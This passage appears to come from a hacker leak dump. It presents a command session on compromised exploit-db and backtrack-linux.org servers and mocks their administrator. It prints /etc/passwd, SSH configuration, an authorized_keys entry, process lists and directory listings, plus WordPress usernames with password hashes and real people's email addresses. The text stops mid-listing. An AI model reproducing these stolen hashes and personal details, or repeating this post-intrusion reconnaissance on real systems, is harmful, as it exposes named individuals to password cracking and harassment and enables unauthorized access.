www-data www-data 20480 Dec 4 09:18 sploits +-rw-r--r-- 1 www-data www-data 9621 Nov 3 19:52 style.css +drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:40 testme +-rw-r--r-- 1 www-data www-data 5699 Nov 4 07:22 tpl_search.php +-rw-r--r-- 1 www-data www-data 16 Nov 28 06:52 update-982374.txt +-rw-r--r-- 1 www-data www-data 50 Aug 26 04:53 updated.php +drwxr-xr-x 3 www-data www-data 4096 Aug 3 09:35 videos +-rw-r--r-- 1 www-data www-data 4391 Aug 26 04:53 wp-activate.php +drwxr-xr-x 8 www-data www-data 4096 Nov 11 17:59 wp-admin +-rw-r--r-- 1 www-data www-data 40284 Aug 26 04:53 wp-app.php +-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-atom.php +-rw-r--r-- 1 www-data www-data 274 Aug 26 04:53 wp-blog-header.php +-rw-r--r-- 1 www-data www-data 3926 Aug 26 04:53 wp-comments-post.php +-rw-r--r-- 1 www-data www-data 238 Aug 26 04:53 wp-commentsrss2.php +-rw-r--r-- 1 www-data www-data 3173 Aug 26 04:53 wp-config-sample.php +-rw-r--r-- 1 www-data www-data 2832 Nov 11 17:59 wp-config.php +drwxr-xr-x 8 www-data www-data 4096 Dec 3 22:49 wp-content +-rw-r--r-- 1 www-data www-data 1255 Aug 26 04:53 wp-cron.php +-rw-r--r-- 1 www-data www-data 240 Aug 26 04:53 wp-feed.php +drwxr-xr-x 7 www-data www-data 4096 Sep 8 13:52 wp-includes +-rw-r--r-- 1 www-data www-data 2002 Aug 26 04:53 wp-links-opml.php +-rw-r--r-- 1 www-data www-data 2441 Aug 26 04:53 wp-load.php +-rw-r--r-- 1 www-data www-data 26160 Sep 3 21:48 wp-login.php +-rw-r--r-- 1 www-data www-data 7774 Aug 26 04:53 wp-mail.php +-rw-r--r-- 1 www-data www-data 487 Aug 26 04:53 wp-pass.php +-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rdf.php +-rw-r--r-- 1 www-data www-data 316 Aug 26 04:53 wp-register.php +-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rss.php +-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-rss2.php +-rw-r--r-- 1 www-data www-data 9177 Sep 8 13:01 wp-settings.php +-rw-r--r-- 1 www-data www-data 18695 Aug 26 04:53 wp-signup.php +-rw-r--r-- 1 www-data www-data 3702 Aug 26 04:53 wp-trackback.php +-rw-r--r-- 1 www-data www-data 93955 Aug 26 04:53 xmlrpc-orig.php +-rw-r--r-- 1 www-data www-data 94184 Aug 26 04:53 xmlrpc.php + + +$ cat wp-config.php + boot/initrd.img-2.6.32-26-server +lrwxrwxrwx 1 root root 32 Oct 4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server +drwxr-xr-x 13 root root 12288 Nov 18 06:54 lib +lrwxrwxrwx 1 root root 4 Jul 9 05:28 lib64 -> /lib +drwx------ 2 root root 16384 Jul 9 05:28 lost+found +drwxr-xr-x 2 root root 4096 Jul 9 15:17 maint +drwxr-xr-x 3 root root 4096 Jul 9 05:28 media +drwxr-xr-x 4 root root 4096 Jul 9 20:03 mnt +drwxr-xr-x 3 root root 4096 Oct 7 16:53 opt +dr-xr-xr-x 227 root root 0 Nov 11 10:45 proc +drwx------ 9 root root 4096 Nov 25 09:08 root +drwxr-xr-x 2 root root 4096 Oct 29 19:00 sbin +drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux +drwxr-xr-x 2 root root 4096 Jul 9 05:28 srv +drwxr-xr-x 13 root root 0 Nov 11 10:45 sys +drwxrwxrwt 3 root root 4096 Dec 4 14:59 tmp +drwxr-xr-x 10 root root 4096 Jul 9 05:28 usr +drwxr-xr-x 19 root root 4096 Sep 24 09:26 var +lrwxrwxrwx 1 root root 29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server +lrwxrwxrwx 1 root root 29 Oct 4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +syslog:x:101:103::/home/syslog:/bin/false +sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin +landscape:x:103:108::/var/lib/landscape:/bin/false +mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false +smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +emgent:x:1003:1002:,,,:/home/emgent:/bin/bash +ossec:x:1004:1003::/var/ossec:/bin/false +ossecm:x:1005:1003::/var/ossec:/bin/false +ossecr:x:1006:1003::/var/ossec:/bin/false + +$ cat /etc/issue +Ubuntu 10.04.1 LTS \n \l + + +$ cat /etc/ssh/sshd_config +# Package generated configuration file +# See the sshd_config(5) manpage for details + +# What ports, IPs and protocols we listen for +Port 22 +# Use these options to restrict which interfaces/protocols sshd will bind to +#ListenAddress :: +#ListenAddress 0.0.0.0 +Protocol 2 +# HostKeys for protocol version 2 +HostKey /etc/ssh/ssh_host_rsa_key +HostKey /etc/ssh/ssh_host_dsa_key +#Privilege Separation is turned on for security +UsePrivilegeSeparation yes + +# Lifetime and size of ephemeral version 1 server key +KeyRegenerationInterval 3600 +ServerKeyBits 768 + +# Logging +SyslogFacility AUTH +LogLevel INFO + +# Authentication: +LoginGraceTime 120 +PermitRootLogin yes +StrictModes yes + +RSAAuthentication yes +PubkeyAuthentication yes +#AuthorizedKeysFile %h/.ssh/authorized_keys + +# Don't read the user's ~/.rhosts and ~/.shosts files +IgnoreRhosts yes +# For this to work you will also need host keys in /etc/ssh_known_hosts +RhostsRSAAuthentication no +# similar for protocol version 2 +HostbasedAuthentication no +# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication +#IgnoreUserKnownHosts yes + +# To enable empty passwords, change to yes (NOT RECOMMENDED) +PermitEmptyPasswords no + +# Change to yes to enable challenge-response passwords (beware issues with +# some PAM modules and threads) +ChallengeResponseAuthentication no + +# Change to no to disable tunnelled clear text passwords +PasswordAuthentication yes + +# Kerberos options +#KerberosAuthentication no +#KerberosGetAFSToken no +#KerberosOrLocalPasswd yes +#KerberosTicketCleanup yes + +# GSSAPI options +#GSSAPIAuthentication no +#GSSAPICleanupCredentials yes + +X11Forwarding yes +X11DisplayOffset 10 +PrintMotd no +PrintLastLog yes +TCPKeepAlive yes +#UseLogin no + +#MaxStartups 10:30:60 +#Banner /etc/issue.net + +# Allow client to pass locale environment variables +AcceptEnv LANG LC_* + +Subsystem sftp /usr/lib/openssh/sftp-server + +# Set this to 'yes' to enable PAM authentication, account processing, +# and session processing. If this is enabled, PAM authentication will +# be allowed through the ChallengeResponseAuthentication and +# PasswordAuthentication. Depending on your PAM configuration, +# PAM authentication via ChallengeResponseAuthentication may bypass +# the setting of "PermitRootLogin without-password". +# If you just want the PAM account and session checks to run without +# PAM authentication, then enable this but set PasswordAuthentication +# and ChallengeResponseAuthentication to 'no'. +UsePAM yes + +$ cd /home + +$ ls -la +total 12 +drwxr-xr-x 3 root root 4096 Aug 3 11:48 . +drwxr-xr-x 26 root root 4096 Nov 30 06:53 .. +drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 emgent + +$ cd emgent + +$ ls -la +total 48 +drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 . +drwxr-xr-x 3 root root 4096 Aug 3 11:48 .. +-rw------- 1 emgent emgent 259 Oct 18 11:39 .bash_history +-rw-r--r-- 1 emgent emgent 220 Aug 3 11:48 .bash_logout +-rw-r--r-- 1 emgent emgent 3103 Aug 3 11:48 .bashrc +drwx------ 2 emgent emgent 4096 Aug 3 11:49 .cache +drwx------ 2 emgent emgent 4096 Aug 3 11:49 .irssi +-rw------- 1 emgent emgent 9 Aug 3 11:50 .nano_history +-rw-r--r-- 1 emgent emgent 675 Aug 3 11:48 .profile +drwxr-xr-x 2 emgent emgent 4096 Aug 3 11:49 .ssh +drwxr-xr-x 3 emgent emgent 4096 Aug 7 07:45 .subversion +drwxr-xr-x 4 emgent emgent 4096 Aug 7 07:46 exploitdb + + + +$ cd .ssh + +$ ls +authorized_keys +cat authorized_keys +ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy + +$ ps aux +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.0 0.0 23680 1244 ? Ss Nov11 0:07 /sbin/init +root 2 0.0 0.0 0 0 ? S Nov11 0:00 [kthreadd] +root 3 0.0 0.0 0 0 ? S Nov11 0:01 [migration/0] +root 4 0.0 0.0 0 0 ? S Nov11 0:12 [ksoftirqd/0] +root 5 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/0] +root 6 0.0 0.0 0 0 ? S Nov11 0:02 [migration/1] +root 7 0.0 0.0 0 0 ? S Nov11 0:04 [ksoftirqd/1] +root 8 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/1] +root 9 0.0 0.0 0 0 ? S Nov11 0:02 [migration/2] +root 10 0.0 0.0 0 0 ? S Nov11 0:02 [ksoftirqd/2] +root 11 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/2] +root 12 0.0 0.0 0 0 ? S Nov11 0:01 [migration/3] +root 13 0.0 0.0 0 0 ? S Nov11 0:05 [ksoftirqd/3] +root 14 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/3] +root 15 0.0 0.0 0 0 ? S Nov11 0:32 [events/0] +root 16 0.0 0.0 0 0 ? S Nov11 13:44 [events/1] +root 17 0.0 0.0 0 0 ? S Nov11 0:17 [events/2] +root 18 0.0 0.0 0 0 ? S Nov11 0:18 [events/3] +root 19 0.0 0.0 0 0 ? S Nov11 0:00 [cpuset] +root 20 0.0 0.0 0 0 ? S Nov11 0:00 [khelper] +root 21 0.0 0.0 0 0 ? S Nov11 0:00 [netns] +root 22 0.0 0.0 0 0 ? S Nov11 0:00 [async/mgr] +root 23 0.0 0.0 0 0 ? S Nov11 0:00 [pm] +root 25 0.0 0.0 0 0 ? S Nov11 0:02 [sync_supers] +root 26 0.0 0.0 0 0 ? S Nov11 0:04 [bdi-default] +root 27 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/0] +root 28 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/1] +root 29 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/2] +root 30 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/3] +root 31 0.0 0.0 0 0 ? S Nov11 11:09 [kblockd/0] +root 32 0.0 0.0 0 0 ? S Nov11 2:17 [kblockd/1] +root 33 0.0 0.0 0 0 ? S Nov11 1:33 [kblockd/2] +root 34 0.0 0.0 0 0 ? S Nov11 1:14 [kblockd/3] +root 35 0.0 0.0 0 0 ? S Nov11 0:00 [kacpid] +root 36 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_notify] +root 37 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_hotplug] +root 38 0.0 0.0 0 0 ? S Nov11 0:00 [ata/0] +root 39 0.0 0.0 0 0 ? S Nov11 0:00 [ata/1] +root 40 0.0 0.0 0 0 ? S Nov11 0:00 [ata/2] +root 41 0.0 0.0 0 0 ? S Nov11 0:00 [ata/3] +root 42 0.0 0.0 0 0 ? S Nov11 0:00 [ata_aux] +root 43 0.0 0.0 0 0 ? S Nov11 0:00 [ksuspend_usbd] +root 44 0.0 0.0 0 0 ? S Nov11 0:00 [khubd] +root 45 0.0 0.0 0 0 ? S Nov11 0:00 [kseriod] +root 46 0.0 0.0 0 0 ? S Nov11 0:00 [kmmcd] +root 51 0.0 0.0 0 0 ? S Nov11 0:00 [khungtaskd] +root 52 0.0 0.0 0 0 ? S Nov11 0:30 [kswapd0] +root 53 0.0 0.0 0 0 ? SN Nov11 0:00 [ksmd] +root 54 0.0 0.0 0 0 ? S Nov11 0:00 [aio/0] +root 55 0.0 0.0 0 0 ? S Nov11 0:00 [aio/1] +root 56 0.0 0.0 0 0 ? S Nov11 0:00 [aio/2] +root 57 0.0 0.0 0 0 ? S Nov11 0:00 [aio/3] +root 58 0.0 0.0 0 0 ? S Nov11 0:00 [ecryptfs-kthrea] +root 59 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/0] +root 60 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/1] +root 61 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/2] +root 62 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/3] +root 65 0.0 0.0 0 0 ? S Nov11 0:00 [pciehpd] +root 66 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_0] +root 67 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_1] +root 69 0.0 0.0 0 0 ? S Nov11 0:00 [kstriped] +root 70 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/0] +root 71 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/1] +root 72 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/2] +root 73 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/3] +root 74 0.0 0.0 0 0 ? S Nov11 0:00 [kmpath_handlerd] +root 75 0.0 0.0 0 0 ? S Nov11 0:00 [ksnapd] +root 76 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/0] +root 77 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/1] +root 78 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/2] +root 79 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/3] +root 80 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/0] +root 81 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/1] +root 82 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/2] +root 83 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/3] +root 191 0.0 0.0 0 0 ? S Nov11 1:03 [mpt_poll_0] +root 192 0.0 0.0 0 0 ? S Nov11 0:00 [mpt/0] +root 268 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_2] +root 285 0.3 0.0 0 0 ? S Nov11 125:09 [jbd2/sda1-8] +root 286 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 287 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 288 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 289 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit] +root 322 0.3 0.0 0 0 ? S Nov11 115:40 [flush-8:0] +root 347 0.0 0.0 16904 640 ? S Nov11 0:00 upstart-udev-bridge --daemon +root 363 0.0 0.0 16920 416 ? S +root 14387 0.0 0.0 0 0 ? Z 15:07 0:00 [firewall-drop.s] +www-data 14407 0.4 0.5 354384 32672 ? S 15:07 0:00 /usr/sbin/apache2 -k start +www-data 14408 0.1 0.4 352604 29276 ? S 15:07 0:00 /usr/sbin/apache2 -k start +www-data 14412 0.3 0.5 354716 32420 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14413 0.4 0.4 352592 29272 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14414 0.2 0.4 352600 28200 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14415 0.3 0.4 352724 29088 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14416 0.2 0.4 353776 29452 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14417 0.2 0.4 353136 28616 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14418 0.3 0.4 353520 29500 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14419 0.7 0.0 0 0 ? Z 15:08 0:00 [apache2] +www-data 14420 0.5 0.5 353976 31084 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14421 0.3 0.4 353252 29180 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14422 0.0 0.1 346724 8076 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14423 0.6 0.5 354352 31720 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14424 0.4 0.4 353808 29848 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14425 0.3 0.4 352584 28252 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14426 0.1 0.1 346748 10564 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14427 0.6 0.4 352976 28944 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14428 0.0 0.1 346724 8204 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14429 0.0 0.1 346724 8196 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14430 0.7 0.4 352976 29032 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14431 0.9 0.4 353668 30120 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14432 0.9 0.4 353368 29668 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14433 0.8 0.4 352976 28836 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14435 1.3 0.4 352716 29364 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14436 1.8 0.4 353736 30320 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14437 0.1 0.1 346236 7760 ? S 15:08 0:00 /usr/sbin/apache2 -k start +www-data 14438 0.0 0.0 14976 1116 ? R 15:08 0:00 ps aux +root 19786 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 19983 0.0 0.0 107420 1940 ? S Nov29 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 19989 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 20015 0.0 0.0 107420 1884 ? S Nov16 0:00 /usr/bin/svnserve -d -r /var/svn/ +root 20286 0.0 0.0 107420 1888 ? S Nov18 0:00 /usr/bin/svnserve -d -r /var/svn/ +mysql 22394 10.4 24.9 2441860 1529604 ? Ssl Nov12 3357:17 /usr/sbin/mysqld + +$ df -h +Filesystem Size Used Avail Use% Mounted on +/dev/sda1 48G 17G 29G 37% / +none 3.0G 172K 3.0G 1% /dev +none 3.0G 0 3.0G 0% /dev/shm +none 3.0G 56K 3.0G 1% /var/run +none 3.0G 0 3.0G 0% /var/lock +none 3.0G 0 3.0G 0% /lib/init/rw +none 48G 17G 29G 37% /var/lib/ureadahead/debugfs + +Wordpress: +admin:$P$B./Y8qG9A2YuqIz4uBAjFRo.9Yv0Fb1::muts@offsec.com +dookie2000ca:$P$B7YVdu0JG/JOf2YAS8WsmQqHnZHf.b/:dookie2000ca:dookie@exploit-db.com +innrwrld:$P$BaJi4YkAt5o/paWUfDMdOOWuqHx/is/:innrwrld:innrwrld@exploit-db.com +ivan:$P$B/YVWEkaYIq3s2QLSmVB/wvXWYqoM80::centaur.mail@gmail.com +sinn3r:$P$BYzu/ozErhWi8hB8IPFdr6Tv2R9rat/:3r:sinn3r@exploit-db.com +loneferret:$P$Bgsl0.nlu4De51qkI8MDoeHDS6iLcM1:loneferret:loneferret@exploit-db.com +ronin:$P$BFw9OFuWa1s/t5DUJwKO6A0Otfkewo0::ronin@exploit-db.com +dijital1:$P$BirOcybWYDo/Z/wrJ5zBq2zaGElV.f/:dijital1:rlh@ciphermonk.net +emgent:$P$BYiha9WKXDzXQm8A8RXboRc7zZuus0.::emgent@backtrack-linux.org +j0fer:$P$Bgtsc7w.Vb6mCkJfJi7JkSO5zJUEBY.::j0fer@exploit-db.com +ReL1K:$P$B6DyRPNYrBuC.WRv5GrDnFg3wAQPo91::kennedyd013@gmail.com +Xpl0it:$P$BGBdVhFBaUM8s9ooGcmB01t.zoK.0V0::mr.xpl0it@gmail.com +fdiskyou:$P$BlgwWd3EmVg4SsfIxzOjqUQfGKfLZD0:fdiskyou:rui@exploit-db.com +rawjaw:$P$Bovffv59pNKpCOOvKlbGqFOmAh.HKb0::rawjaw@exploit-db.com +djokica:$P$BNeyg6NPYJWO9fzjfZs1okvMiM0vq51::centaur@pavko.info +xxDigiPxx:$P$B2eEGgTNsZnM4DFpIr4kNrKXv.ivyg/:xxdigipxx:xxtwistedpairxx@comcast.net +muts:$P$Bn.MAuG.OlZ1NtTxq0WWAUwhVEfusC.::muts@offensive-security.com +Ryujin:$P$BZ75UnhRqkJZj82bWfXbeD6dVxzXTG0::ryujin@offsec.com +didn0t:$P$BkGM.gSmmmuDlkJUKjCzy1LfUn9AnS.::paul@pizza.org +zelik:$P$BYjCAaqW0tcdNV3MZviRZoN./.HMKn0::tal.zeltzer@gmail.com +bitform:$P$BLk7y3.7JTn12lRYj25A/JXJ1W0SIA1::mattgraeber@gmail.com +bolexxx:$P$B1liji1bDZoOOwnVwV3Aa59Mqux0FC1::bolexxx@offsec.com +h00die:$P$Behl/g/GHQo5zxciUMgjPPzu7ZI8nO/::ragecyr@exploit-db.com +MaXe:$P$B6PKmgTlcm5L5kpysXfksmEmRfMy6U.::MaXe@intern0t.net +marked_doe:$P$By1rR96ByDsyil/yQa79qBE/A7nbOA1:marked_doe:marc@doudiet.net +code0wnz:$P$Bw1OuJHHzMtUBd8oSjmFoQYKtzjaC..:code0wnz:code0wnz@gmail.com +Dr_IDE:$P$BR.ReeHZDabreI8G0D5NARv8oY6SOP/::dr_ide@hushmail.com +Sud0:$P$BqovGmeqOSCzsHFso9q4goSZ4hkWbK1: :Sud0.x90@gmail.com +TecR0c:$P$BXoaJm6vL1VKJWz.K3m1M.XXVoXU9K/::tecr0c@corelan.be +kripthor:$P$BpUEGtZ3PvzfYotKDvvRA1AU9U4.iq1:kripthor:umbelino@crazydog.pt +ryp:$P$BwQ3FGe9q7spL3vkhxTyYMBkL4UGOQ.::adam@rypmarketing.com +fdisk:$P$Blv3X9wG6b/Yo3SDi22/nIJ34t2jGi/::ruifilipe.reis@gmail.com +root-boy:$P$BWq8dOxSe/HKG/kE3cXpGyAOgR6F.n1:root-boy:root-boy@exploit-db.com + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ backtrack ~ ! + +Since we already tapped into exploit-db and their server lies in the +same subnet with backtrack, we decided to check out their mad +security. Backtrack is run by muts, the same guy who also administers +exploit-db, so no wonder why it was super easy to get a shell... + + +$ uname -a +Linux backtrack-linux.org 2.6.32.26-175.fc12.x86_64 #1 SMP Wed Dec 1 21:39:34 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux + +$ id +uid=48(apache) gid=494(apache) groups=494(apache) context=unconfined_u:system_r:httpd_t:s0 + +$ alias ls="ls -la" + +$ ls +total 110 +dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 . +dr-xr-xr-x. 25 root root 4096 Dec 7 08:42 .. +-rw-r--r--. 1 root root 0 Dec 7 08:42 .autofsck +drwx------. 2 root root 4096 Dec 10 03:40 backup +dr-xr-xr-x. 2 root root 4096 Nov 29 19:59 bin +dr-xr-xr-x. 5 root root 1024 Dec 7 08:41 boot +drwxr-xr-x. 17 root root 3580 Dec 7 08:43 dev +drwxr-xr-x. 66 root root 4096 Dec 7 08:42 etc +drwxr-xr-x. 3 root root 4096 Aug 14 20:50 home +dr-xr-xr-x. 9 root root 4096 Aug 11 04:01 lib +dr-xr-xr-x. 9 root root 12288 Nov 29 20:00 lib64 +drwx------. 2 root root 16384 Aug 11 02:01 lost+found +drwxr-xr-x. 2 root root 4096 Aug 11 04:42 maint +drwxr-xr-x. 2 root root 4096 Aug 25 2009 media +drwxr-xr-x. 2 root root 4096 Aug 25 2009 mnt +drwxr-xr-x. 2 root root 4096 Aug 25 2009 opt +dr-xr-xr-x. 160 root root 0 Dec 7 08:42 proc +drwxr-xr-x. 5 root root 4096 Dec 3 17:16 recovery +dr-xr-x---. 4 root root 4096 Dec 10 08:50 root +dr-xr-xr-x. 2 root root 12288 Nov 29 19:59 sbin +drwxr-xr-x. 7 root root 0 Dec 7 08:42 selinux +drwxr-xr-x. 2 root root 4096 Aug 25 2009 srv +drwxr-xr-x. 13 root root 0 Dec 7 08:42 sys +drwxrwxrwt. 4 root root 4096 Dec 10 14:08 tmp +drwxr-xr-x. 14 root root 4096 Aug 11 02:03 usr +drwxr-xr-x. 20 root root 4096 Aug 14 20:45 var + + +$ cat /etc/issue +Fedora release 12 (Constantine) +Kernel \r on an \m (\l) + +$ cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin +dbus:x:81:81:System message bus:/:/sbin/nologin +mailnull:x:47:497::/var/spool/mqueue:/sbin/nologin +smmsp:x:51:496::/var/spool/mqueue:/sbin/nologin +sshd:x:74:495:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin +apache:x:48:494:Apache:/var/www:/sbin/nologin +mysql:x:27:493:MySQL Server:/var/lib/mysql:/bin/bash +ossec:x:500:500::/var/ossec:/sbin/nologin +ossecm:x:501:500::/var/ossec:/sbin/nologin +ossecr:x:502:500::/var/ossec:/sbin/nologin +ntp:x:38:38::/etc/ntp:/sbin/nologin +tcpdump:x:72:72::/:/sbin/nologin + +$ cd +/var/www/html/ + +$ ls +total 90224 +drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 . +drwxr-xr-x. 6 root root 4096 Aug 18 10:30 .. +-rw-r--r--. 1 apache apache 4183 Dec 5 16:50 .htaccess +-rw-r--r--. 1 apache apache 1156 Aug 11 03:17 HT +-rw-r--r--. 1 apache apache 2233 Aug 11 03:17 HT-ORIG +-rw-r--r--. 1 apache apache 1526525 Nov 11 14:01 IMG_0585.JPG +drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 ads +-rw-r--r--. 1 apache apache 125832 Nov 19 12:18 bootsplash.jpg +-rw-r--r--. 1 apache apache 754444 Aug 11 03:16 bt-nsa.png +-rw-r--r--. 1 apache apache 757498 Aug 11 03:16 bt-nsa2.png +-rw-r--r--. 1 apache apache 81597 Aug 11 03:16 bt4-final-vm.zip.torrent +-rw-r--r--. 1 apache apache 60094 Aug 11 03:16 bt4-final.iso.torrent +-rw-r--r--. 1 apache apache 44 Aug 11 03:16 bt4r1.txt +-rw-r--r--. 1 root root 686248 Nov 23 10:47 bt4r2.png +-rw-r--r--. 1 apache apache 160728 Aug 11 03:16 btfail.png +-rw-r--r--. 1 apache apache 476 Aug 11 03:16 collapsible_ad.html +-rwxr-xr-x. 1 apache apache 13397784 Aug 11 03:16 d.bin +-rw-r--r--. 1 apache apache 121 Aug 11 03:16 d.lic +-rw-r--r--. 1 apache apache 12844822 Aug 11 03:16 d32.bin +drwxr-xr-x. 2 apache apache 4096 Aug 11 03:16 documents +-rw-r--r--. 1 apache apache 3342 Aug 11 03:16 down.php +-rw-r--r--. 1 apache apache 4158 Aug 11 03:16 download-orig.php +-rw-r--r--. 1 apache apache 4945 Nov 22 11:38 download.php +-rw-r--r--. 1 apache apache 15125 Aug 11 03:16 error.php +-rw-r--r--. 1 apache apache 137383 Aug 11 03:16 example-2.jpg +-rw-r--r--. 1 apache apache 1150 Aug 11 03:16 favicon.ico +drwxr-xr-x. 21 apache apache 4096 Nov 22 18:56 forums +-rw-r--r--. 1 apache apache 87176 Aug 11 03:17 google.png +-rw-r--r--. 1 apache apache 53 Aug 11 03:17 googled6c4817aa45e0032.html +-rw-r--r--. 1 apache apache 23 Aug 11 